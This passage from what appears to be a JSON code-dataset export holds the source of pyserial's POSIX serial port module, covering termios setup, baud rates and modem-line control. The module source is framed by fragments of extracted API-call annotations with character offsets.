numpy as np\\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\\n', (221, 237), True, 'import numpy as np\\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\\n', (248, 316), True, 'import numpy as np\\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, lam_test]'], {}), '([lam_o2, lam_test])\\n', (324, 344), True, 'import numpy as np\\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\\n', (356, 385), True, 'import numpy as np\\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\\n', (394, 420), True, 'import numpy as np\\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\\n', (433, 471), True, 'import numpy as np\\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\\n', (482, 514), True, 'import numpy as np\\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\\n', (525, 725), True, 'import numpy as np\\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\\n', (860, 868), True, 'import numpy as np\\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\\n', (894, 907), True, 'import numpy as np\\n'), ((755, 802), 'os.makedirs', 'os.makedirs', ([\"('../../raw_output/EnvEq/' + f_name)\"], {}), \"('../../raw_output/EnvEq/' + f_name)\\n\", (766, 802), False, 'import os\\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\\n', (937, 950), True, 'import numpy as np\\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\\n', (1272, 1332), True, 'import EnvEq as ee\\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\\n', (1365, 1368), False, 'from multiprocessing import Pool\\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\\n', (978, 1024), True, 'import numpy as np\\n')]"}}},{"rowIdx":717,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python\n#\n# Python Serial Port Extension for Win32, Linux, BSD, Jython\n# module for serial IO for POSIX compatible systems, like Linux\n# see __init__.py\n#\n# (C) 2001-2010 <>\n# this is distributed under a free software license, see license.txt\n#\n# parts based on code from <>:\n# ftp://ftp.visi.com/users/grante/python/PosixSerial.py\n#\n# references: http://www.easysw.com/~mike/serial/serial.html\n\nimport sys, os, fcntl, termios, struct, select, errno, time\nfrom .serialutil import *\n\n# Do check the Python version as some constants have moved.\nif (sys.hexversion < 0x020100f0):\n import TERMIOS\nelse:\n TERMIOS = termios\n\nif (sys.hexversion < 0x020200f0):\n import FCNTL\nelse:\n FCNTL = fcntl\n\n# try to detect the OS so that a device can be selected...\n# this code block should supply a device() and set_special_baudrate() function\n# for the platform\nplat = sys.platform.lower()\n\nif plat[:5] == 'linux': # Linux (confirmed)\n\n def device(port):\n return '/dev/ttyS%d' % port\n\n ASYNC_SPD_MASK = 0x1030\n ASYNC_SPD_CUST = 0x0030\n\n def set_special_baudrate(port, baudrate):\n import array\n buf = array.array('i', [0] * 32)\n\n # get serial_struct\n FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)\n\n # set custom divisor\n buf[6] = buf[7] / baudrate\n\n # update flags\n buf[4] &= ~ASYNC_SPD_MASK\n buf[4] |= ASYNC_SPD_CUST\n\n # set serial_struct\n try:\n res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)\n except IOError:\n raise ValueError('Failed to set custom baud rate: %r' % baudrate)\n\n baudrate_constants = {\n 0: 0000000, # hang up\n 50: 0o000001,\n 75: 0o000002,\n 110: 0o000003,\n 134: 0o000004,\n 150: 0o000005,\n 200: 0o000006,\n 300: 0o000007,\n 600: 0o000010,\n 1200: 0o000011,\n 1800: 0o000012,\n 2400: 0o000013,\n 4800: 0o000014,\n 9600: 0o000015,\n 19200: 0o000016,\n 38400: 0o000017,\n 57600: 0o010001,\n 115200: 0o010002,\n 230400: 0o010003,\n 460800: 0o010004,\n 500000: 0o010005,\n 576000: 0o010006,\n 921600: 0o010007,\n 1000000: 0o010010,\n 1152000: 0o010011,\n 1500000: 0o010012,\n 2000000: 0o010013,\n 2500000: 0o010014,\n 3000000: 0o010015,\n 3500000: 0o010016,\n 4000000: 0o010017\n }\n\nelif plat == 'cygwin': # cygwin/win32 (confirmed)\n\n def device(port):\n return '/dev/com%d' % (port + 1)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat == 'openbsd3': # BSD (confirmed)\n\n def device(port):\n return '/dev/ttyp%d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:3] == 'bsd' or \\\n plat[:7] == 'freebsd' or \\\n plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)\n\n def device(port):\n return '/dev/cuad%d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:6] == 'darwin': # OS X\n\n version = os.uname()[2].split('.')\n # Tiger or above can support arbitrary serial speeds\n if int(version[0]) >= 8:\n def set_special_baudrate(port, baudrate):\n # use IOKit-specific call to set up high speeds\n import array, fcntl\n buf = array.array('i', [baudrate])\n IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)\n fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)\n else: # version < 8\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"baud rate not supported\")\n\n def device(port):\n return '/dev/cuad%d' % port\n\n baudrate_constants = {}\n\n\nelif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk\n\n def device(port):\n return '/dev/dty%02d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:4] == 'irix': # IRIX (partially tested)\n\n def device(port):\n return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:2] == 'hp': # HP-UX (not tested)\n\n def device(port):\n return '/dev/tty%dp0' % (port+1)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)\n\n def device(port):\n return '/dev/tty%c' % (ord('a')+port)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:3] == 'aix': # AIX\n\n def device(port):\n return '/dev/tty%d' % (port)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelse:\n # platform detection has failed...\n sys.stderr.write(\"\"\"\\\ndon't know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. 'first serial port: /dev/ttyS0'\nand with a bit luck you can get this module running...\n\"\"\" % (sys.platform, os.name, VERSION))\n # no exception, just continue with a brave attempt to build a device name\n # even if the device name is not correct for the platform it has chances\n # to work using a string with the real device name as port parameter.\n def device(portum):\n return '/dev/ttyS%d' % portnum\n def set_special_baudrate(port, baudrate):\n raise SerialException(\"sorry don't know how to handle non standard baud rate on this platform\")\n baudrate_constants = {}\n #~ raise Exception, \"this module does not run on this platform, sorry.\"\n\n# whats up with \"aix\", \"beos\", ....\n# they should work, just need to know the device names.\n\n\n# load some constants for later use.\n# try to use values from TERMIOS, use defaults from linux otherwise\nTIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415\nTIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416\nTIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417\nTIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418\n\n#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001\nTIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002\nTIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004\n#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008\n#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010\n\nTIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020\nTIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040\nTIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080\nTIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100\nTIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR\nTIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG\n#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000\n#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000\nTIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B\n\nTIOCM_zero_str = struct.pack('I', 0)\nTIOCM_RTS_str = struct.pack('I', TIOCM_RTS)\nTIOCM_DTR_str = struct.pack('I', TIOCM_DTR)\n\nTIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427\nTIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428\n\n\nclass PosixSerial(SerialBase):\n \"\"\"Serial port class POSIX implementation. Serial port configuration is \n done with termios and fcntl. Runs on Linux and many other Un*x like\n systems.\"\"\"\n\n def open(self):\n \"\"\"Open port with current settings. This may throw a SerialException\n if the port cannot be opened.\"\"\"\n self.fd = None\n if self._port is None:\n raise SerialException(\"Port must be configured before it can be used.\")\n # open\n try:\n self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)\n except Exception as msg:\n self.fd = None\n raise SerialException(\"could not open port %s: %s\" % (self._port, msg))\n #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking\n\n try:\n self._reconfigurePort()\n except:\n try:\n os.close(self.fd)\n except:\n # ignore any exception when closing the port\n # also to keep original exception that happened when setting up\n pass\n self.fd = None\n raise\n else:\n self._isOpen = True\n #~ self.flushInput()\n\n\n def _reconfigurePort(self):\n \"\"\"Set communication parameters on opened port.\"\"\"\n if self.fd is None:\n raise SerialException(\"Can only operate on a valid file descriptor\")\n custom_baud = None\n\n vmin = vtime = 0 # timeout is done via select\n if self._interCharTimeout is not None:\n vmin = 1\n vtime = int(self._interCharTimeout * 10)\n try:\n iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)\n except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here\n raise SerialException(\"Could not configure port: %s\" % msg)\n # set up raw mode / no echo / binary\n cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)\n lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|\n TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT\n for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk\n if hasattr(TERMIOS, flag):\n lflag &= ~getattr(TERMIOS, flag)\n\n oflag &= ~(TERMIOS.OPOST)\n iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)\n if hasattr(TERMIOS, 'IUCLC'):\n iflag &= ~TERMIOS.IUCLC\n if hasattr(TERMIOS, 'PARMRK'):\n iflag &= ~TERMIOS.PARMRK\n\n # setup baud rate\n try:\n ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))\n except AttributeError:\n try:\n ispeed = ospeed = baudrate_constants[self._baudrate]\n except KeyError:\n #~ raise ValueError('Invalid baud rate: %r' % self._baudrate)\n # may need custom baud rate, it isn't in our list.\n ispeed = ospeed = getattr(TERMIOS, 'B38400')\n try:\n custom_baud = int(self._baudrate) # store for later\n except ValueError:\n raise ValueError('Invalid baud rate: %r' % self._baudrate)\n else:\n if custom_baud < 0:\n raise ValueError('Invalid baud rate: %r' % self._baudrate)\n\n # setup char len\n cflag &= ~TERMIOS.CSIZE\n if self._bytesize == 8:\n cflag |= TERMIOS.CS8\n elif self._bytesize == 7:\n cflag |= TERMIOS.CS7\n elif self._bytesize == 6:\n cflag |= TERMIOS.CS6\n elif self._bytesize == 5:\n cflag |= TERMIOS.CS5\n else:\n raise ValueError('Invalid char len: %r' % self._bytesize)\n # setup stopbits\n if self._stopbits == STOPBITS_ONE:\n cflag &= ~(TERMIOS.CSTOPB)\n elif self._stopbits == STOPBITS_ONE_POINT_FIVE:\n cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5\n elif self._stopbits == STOPBITS_TWO:\n cflag |= (TERMIOS.CSTOPB)\n else:\n raise ValueError('Invalid stop bit specification: %r' % self._stopbits)\n # setup parity\n iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)\n if self._parity == PARITY_NONE:\n cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)\n elif self._parity == PARITY_EVEN:\n cflag &= ~(TERMIOS.PARODD)\n cflag |= (TERMIOS.PARENB)\n elif self._parity == PARITY_ODD:\n cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)\n else:\n raise ValueError('Invalid parity: %r' % self._parity)\n # setup flow control\n # xonxoff\n if hasattr(TERMIOS, 'IXANY'):\n if self._xonxoff:\n iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)\n else:\n iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)\n else:\n if self._xonxoff:\n iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)\n else:\n iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)\n # rtscts\n if hasattr(TERMIOS, 'CRTSCTS'):\n if self._rtscts:\n cflag |= (TERMIOS.CRTSCTS)\n else:\n cflag &= ~(TERMIOS.CRTSCTS)\n elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name\n if self._rtscts:\n cflag |= (TERMIOS.CNEW_RTSCTS)\n else:\n cflag &= ~(TERMIOS.CNEW_RTSCTS)\n # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??\n\n # buffer\n # vmin \"minimal number of characters to be read. = for non blocking\"\n if vmin < 0 or vmin > 255:\n raise ValueError('Invalid vmin: %r ' % vmin)\n cc[TERMIOS.VMIN] = vmin\n # vtime\n if vtime < 0 or vtime > 255:\n raise ValueError('Invalid vtime: %r' % vtime)\n cc[TERMIOS.VTIME] = vtime\n # activate settings\n termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])\n\n # apply custom baud rate, if any\n if custom_baud is not None:\n set_special_baudrate(self, custom_baud)\n\n def close(self):\n \"\"\"Close port\"\"\"\n if self._isOpen:\n if self.fd is not None:\n os.close(self.fd)\n self.fd = None\n self._isOpen = False\n\n def makeDeviceName(self, port):\n return device(port)\n\n # - - - - - - - - - - - - - - - - - - - - - - - -\n\n def inWaiting(self):\n \"\"\"Return the number of characters currently in the input buffer.\"\"\"\n #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)\n s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)\n return struct.unpack('I',s)[0]\n\n # select based implementation, proved to work on many systems\n def read(self, size=1):\n \"\"\"Read size bytes from the serial port. If a timeout is set it may\n return less characters as requested. With no timeout it will block\n until the requested number of bytes is read.\"\"\"\n if self.fd is None: raise portNotOpenError\n read = bytearray()\n while len(read) < size:\n ready,_,_ = select.select([self.fd],[],[], self._timeout)\n # If select was used with a timeout, and the timeout occurs, it\n # returns with empty lists -> thus abort read operation.\n # For timeout == 0 (non-blocking operation) also abort when there\n # is nothing to read.\n if not ready:\n break # timeout\n buf = os.read(self.fd, size-len(read))\n # read should always return some data as select reported it was\n # ready to read when we get to this point.\n if not buf:\n # Disconnected devices, at least on Linux, show the\n # behavior that they are always ready to read immediately\n # but reading returns nothing.\n raise SerialException('device reports readiness to read but returned no data (device disconnected?)')\n read.extend(buf)\n return bytes(read)\n\n def write(self, data):\n \"\"\"Output the given string over the serial port.\"\"\"\n if self.fd is None: raise portNotOpenError\n t = len(data)\n d = data\n if self._writeTimeout is not None and self._writeTimeout > 0:\n timeout = time.time() + self._writeTimeout\n else:\n timeout = None\n while t > 0:\n try:\n n = os.write(self.fd, d)\n if timeout:\n # when timeout is set, use select to wait for being ready\n # with the time left as timeout\n timeleft = timeout - time.time()\n if timeleft < 0:\n raise writeTimeoutError\n _, ready, _ = select.select([], [self.fd], [], timeleft)\n if not ready:\n raise writeTimeoutError\n d = d[n:]\n t = t - n\n except OSError as v:\n if v.errno != errno.EAGAIN:\n raise SerialException('write failed: %s' % (v,))\n return len(data)\n\n def flush(self):\n \"\"\"Flush of file like objects. In this case, wait until all data\n is written.\"\"\"\n self.drainOutput()\n\n def flushInput(self):\n \"\"\"Clear input buffer, discarding all that is in the buffer.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcflush(self.fd, TERMIOS.TCIFLUSH)\n\n def flushOutput(self):\n \"\"\"Clear output buffer, aborting the current output and\n discarding all that is in the buffer.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcflush(self.fd, TERMIOS.TCOFLUSH)\n\n def sendBreak(self, duration=0.25):\n \"\"\"Send break condition. Timed, returns to idle state after given duration.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcsendbreak(self.fd, int(duration/0.25))\n\n def setBreak(self, level=1):\n \"\"\"Set break: Controls TXD. When active, no transmitting is possible.\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCSBRK)\n else:\n fcntl.ioctl(self.fd, TIOCCBRK)\n\n def setRTS(self, level=1):\n \"\"\"Set terminal status line: Request To Send\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)\n else:\n fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)\n\n def setDTR(self, level=1):\n \"\"\"Set terminal status line: Data Terminal Ready\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)\n else:\n fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)\n\n def getCTS(self):\n \"\"\"Read terminal status line: Clear To Send\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_CTS != 0\n\n def getDSR(self):\n \"\"\"Read terminal status line: Data Set Ready\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_DSR != 0\n\n def getRI(self):\n \"\"\"Read terminal status line: Ring Indicator\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_RI != 0\n\n def getCD(self):\n \"\"\"Read terminal status line: Carrier Detect\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_CD != 0\n\n # - - platform specific - - - -\n\n def drainOutput(self):\n \"\"\"internal - not portable!\"\"\"\n if self.fd is None: raise portNotOpenError\n termios.tcdrain(self.fd)\n\n def nonblocking(self):\n \"\"\"internal - not portable!\"\"\"\n if self.fd is None:\n raise portNotOpenError\n fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n\n def fileno(self):\n \"\"\"For easier use of the serial port instance with select.\n WARNING: this function is not portable to different platforms!\"\"\"\n if self.fd is None: raise portNotOpenError\n return self.fd\n\n def flowControl(self, enable):\n \"\"\"manually control flow - when hardware or software flow control is\n enabled\"\"\"\n if enable:\n termios.tcflow(self.fd, TERMIOS.TCION)\n else:\n termios.tcflow(self.fd, TERMIOS.TCIOFF)\n\n\n# assemble Serial class with the platform specifc implementation and the base\n# for file-like behavior. for Python 2.6 and newer, that provide the new I/O\n# library, derrive from io.RawIOBase\ntry:\n import io\nexcept ImportError:\n # classic version with our own file-like emulation\n class Serial(PosixSerial, FileLike):\n pass\nelse:\n # io library present\n class Serial(PosixSerial, io.RawIOBase):\n pass\n\nclass PosixPollSerial(Serial):\n \"\"\"poll based read implementation. not all systems support poll properly.\n however this one has better handling of errors, such as a device\n disconnecting while it's in use (e.g. USB-serial unplugged)\"\"\"\n\n def read(self, size=1):\n \"\"\"Read size bytes from the serial port. If a timeout is set it may\n return less characters as requested. With no timeout it will block\n until the requested number of bytes is read.\"\"\"\n if self.fd is None: raise portNotOpenError\n read = bytearray()\n poll = select.poll()\n poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)\n if size > 0:\n while len(read) < size:\n # print \"\\tread(): size\",size, \"have\", len(read) #debug\n # wait until device becomes ready to read (or something fails)\n for fd, event in poll.poll(self._timeout*1000):\n if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):\n raise SerialException('device reports error (poll)')\n # we don't care if it is select.POLLIN or timeout, that's\n # handled below\n buf = os.read(self.fd, size - len(read))\n read.extend(buf)\n if ((self._timeout is not None and self._timeout >= 0) or \n (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:\n break # early abort on timeout\n return bytes(read)\n\n\nif __name__ == '__main__':\n s = Serial(0,\n baudrate=19200, # baud rate\n bytesize=EIGHTBITS, # number of data bits\n parity=PARITY_EVEN, # enable parity checking\n stopbits=STOPBITS_ONE, # number of stop bits\n timeout=3, # set a timeout value, None for waiting forever\n xonxoff=0, # enable software flow control\n rtscts=0, # enable RTS/CTS flow control\n )\n s.setRTS(1)\n s.setDTR(1)\n s.flushInput()\n s.flushOutput()\n s.write('hello')\n sys.stdout.write('%r\\n' % s.read(5))\n sys.stdout.write('%s\\n' % s.inWaiting())\n del s\n\n"},"apis":{"kind":"list like","value":["os.open","fcntl.fcntl","termios.tcflush","select.poll","termios.tcflow","termios.tcdrain","termios.tcsetattr","FCNTL.ioctl","os.uname","select.select","array.array","os.close","os.write","struct.pack","sys.stderr.write","struct.unpack","time.time","sys.platform.lower","fcntl.ioctl","termios.tcgetattr"],"string":"[\n \"os.open\",\n \"fcntl.fcntl\",\n \"termios.tcflush\",\n \"select.poll\",\n \"termios.tcflow\",\n \"termios.tcdrain\",\n \"termios.tcsetattr\",\n \"FCNTL.ioctl\",\n \"os.uname\",\n \"select.select\",\n \"array.array\",\n \"os.close\",\n \"os.write\",\n \"struct.pack\",\n \"sys.stderr.write\",\n \"struct.unpack\",\n \"time.time\",\n \"sys.platform.lower\",\n \"fcntl.ioctl\",\n \"termios.tcgetattr\"\n]"},"extract_api":{"kind":"string","value":"[((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', '(0)'], {}), \"('I', 0)\\n\", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', 'TIOCM_RTS'], {}), \"('I', TIOCM_RTS)\\n\", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', 'TIOCM_DTR'], {}), \"('I', TIOCM_DTR)\\n\", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((1178, 1204), 'array.array', 'array.array', (['\"\"\"i\"\"\"', '([0] * 32)'], {}), \"('i', [0] * 32)\\n\", (1189, 1204), False, 'import array, fcntl\\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\\n', (1253, 1288), False, 'import FCNTL\\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\\n ispeed, ospeed, cc])\\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\\n', (15346, 15380), False, 'import array, fcntl\\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (19773, 19808), False, 'import array, fcntl\\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20018, 20053), False, 'import array, fcntl\\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20262, 20297), False, 'import array, fcntl\\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20505, 20540), False, 'import array, fcntl\\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\\n', (20933, 20972), False, 'import array, fcntl\\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), 